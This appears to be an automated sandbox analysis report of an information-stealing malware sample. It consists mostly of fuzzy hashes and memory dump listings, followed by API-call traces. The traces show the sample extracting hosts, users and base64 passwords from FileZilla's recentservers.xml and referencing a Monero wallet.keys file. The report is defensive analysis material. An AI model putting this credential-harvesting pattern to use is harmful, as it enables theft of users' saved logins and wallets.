                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                  • Instruction ID: dfaeaf42a61ad4311ac1548681301637420eaee7987cddee907b1e49e7e3eaaf
                                  • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                  • Instruction Fuzzy Hash: 71B11671A097518FD706EF39C481215F7E1AFE6280F50C72EE9A5B7762EB31E8818740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction ID: e81a71d27f730d7a88889719bf021834a316368c7b60ade83d69e95861f4f51b
                                  • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction Fuzzy Hash: 0F91D475A002119BDF15CEA8DC80BFEB3A0AB47310F194564ED19AB382D371DE96E7A1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction ID: 49a612fe83aaff791e38b26014caf519407bbc487ff7d1c832895795b649c840
                                  • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction Fuzzy Hash: 3DB14A316106199FD715CF28D48AB657BE0FF45364F29865CE8AACF6E2C335EA81CB40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction ID: 566563a5a3f48f7e3839985824f4e9fa6734f6017ee6fa58d7c81cc5d0937aa7
                                  • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction Fuzzy Hash: CFC14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7188222042d9527a87323438a0ce0a4554f2f03da71fbcc82b11fe0cfb98388b
                                  • Instruction ID: d8f3ddba8100e217cad0e4414362b7f35f685136000154d8e47da519964af1b1
                                  • Opcode Fuzzy Hash: 7188222042d9527a87323438a0ce0a4554f2f03da71fbcc82b11fe0cfb98388b
                                  • Instruction Fuzzy Hash: AA8116F3B082144BF3046D3DDC957BAB6D6DBE4320F2B823DEA94D3784E97989024695
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction ID: da9522ef7242a64c733ecf4b37d787dae31a8b1140eab178acc871e5e4a0f499
                                  • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                  • Instruction Fuzzy Hash: 869166308287916AEB168B7CCC427AAB794FFE6350F14C31AF999724E1FB718681D345
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction ID: e798cfe420e990fc24b0c6b0339dfdd87db8afc9019c5ef4f6dfd1f46afa711a
                                  • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                  • Instruction Fuzzy Hash: 6BA12072A10A19DBEB19CF55CCC1A9EBBB1FB55314F14C62AD41AE73A0D334AA84CF50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction ID: f414410a75c1b5229cac6ad114a3ce18e67ce4fb9e8844c4a7bbf0c80bfc54ae
                                  • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                  • Instruction Fuzzy Hash: 8BA17F72E083519BD308CF65C89075BF7E2EFC8710F1ACA3DA8A997254D774E8419B82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 922e605ceea91c14dba8fda932fe174109074c098e8a21d0d19e39c05c69ae1e
                                  • Instruction ID: a1746f7045c39e9ece66748c3da15a476f43516c7bead61c181d97079413b341
                                  • Opcode Fuzzy Hash: 922e605ceea91c14dba8fda932fe174109074c098e8a21d0d19e39c05c69ae1e
                                  • Instruction Fuzzy Hash: C551F7B3A0C510DBD3085B18EC5953EFEAAAB94A50F16853EE5C797344E97128018F97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6130326437054d0442b24b6454b03becf38faabe2de4558289ce54037d16844
                                  • Instruction ID: 9abceb25caf5635fe73ce2fd47dbce6ec02c73c9970590710481aa3e9b5aaba6
                                  • Opcode Fuzzy Hash: a6130326437054d0442b24b6454b03becf38faabe2de4558289ce54037d16844
                                  • Instruction Fuzzy Hash: 035136F39092249FE304AE3DDC5537ABBD5EB85320F2B863DDA88D7784E935480586C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d71257c8a0eafba88e3c607418e32697df1452658efee59bcc2656664d07fe83
                                  • Instruction ID: c5f0a67f572421878dfbb2930d117f43e2a1707f7a71e15fbef2a7bf7dbbcf9f
                                  • Opcode Fuzzy Hash: d71257c8a0eafba88e3c607418e32697df1452658efee59bcc2656664d07fe83
                                  • Instruction Fuzzy Hash: CA5117F36182009BF308AE3DEC8973ABAD6DF94720F1A463DD6D5C77C4D9395804864A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec00cd3279aaaf8448ffb3edca824dd8aaa824c14ab4c7838bcd8ff2875b30ec
                                  • Instruction ID: d6dccbbc558662346b4b5bea187ea6118874113fae152b56321e0b4805dbc1ce
                                  • Opcode Fuzzy Hash: ec00cd3279aaaf8448ffb3edca824dd8aaa824c14ab4c7838bcd8ff2875b30ec
                                  • Instruction Fuzzy Hash: 134116F37192086FE300A97EEC4477BB79ADBD4364F2A863AE794C3794E83958064191
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e89752d0818089b8cb5e0a472ec1c933a2f0ed365e311ac1e1f79537b7214ba
                                  • Instruction ID: 5ac513a418bcff8d1c94fb4948399c3aa6d307558c88a11da6d32d3343ee2614
                                  • Opcode Fuzzy Hash: 9e89752d0818089b8cb5e0a472ec1c933a2f0ed365e311ac1e1f79537b7214ba
                                  • Instruction Fuzzy Hash: CD414AF39082084BF3146D39ED457B7BBD6D794320F16863DDA88D3B80ED3958058286
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction ID: 79fd28d4ac664d2cf80c248ae9effe174ab67b0db4583eaa5072557287401dd9
                                  • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                  • Instruction Fuzzy Hash: 2B513B62E09BD58AD7058B7544502EEBFB21FE6210F1E829EC4981F383C3759689D3E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                  • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                  • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8F9B
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00BC0DBF,00BC0DBE,00BC0DBB,00BC0DBA), ref: 00BB04C2
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB04C9
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BB04E5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB04F3
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BB052F
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB053D
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00BB0579
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB0587
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BB05C3
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB05D5
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB0662
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB067A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB0692
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB06AA
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BB06C2
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00BB06D1
                                  • lstrcat.KERNEL32(?,url: ), ref: 00BB06E0
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB06F3
                                  • lstrcat.KERNEL32(?,00BC1770), ref: 00BB0702
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0715
                                  • lstrcat.KERNEL32(?,00BC1774), ref: 00BB0724
                                  • lstrcat.KERNEL32(?,login: ), ref: 00BB0733
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0746
                                  • lstrcat.KERNEL32(?,00BC1780), ref: 00BB0755
                                  • lstrcat.KERNEL32(?,password: ), ref: 00BB0764
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0777
                                  • lstrcat.KERNEL32(?,00BC1790), ref: 00BB0786
                                  • lstrcat.KERNEL32(?,00BC1794), ref: 00BB0795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB7), ref: 00BB07EE
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 558f1dbea71e8f349ac892ab6b395c5daa8d0404ac5d2fe57e44e2f3c86bf6a5
                                  • Instruction ID: 5bcc66b543f9986c3681721d71072ac5644637d5bfc555e6d843ebae02137f0f
                                  • Opcode Fuzzy Hash: 558f1dbea71e8f349ac892ab6b395c5daa8d0404ac5d2fe57e44e2f3c86bf6a5
                                  • Instruction Fuzzy Hash: BDD10E75D10208AFCB14FBE4DD96EFE77B9AF14301F404598F116B60A2DEB0AA48CB61
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA5A48
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA5A63
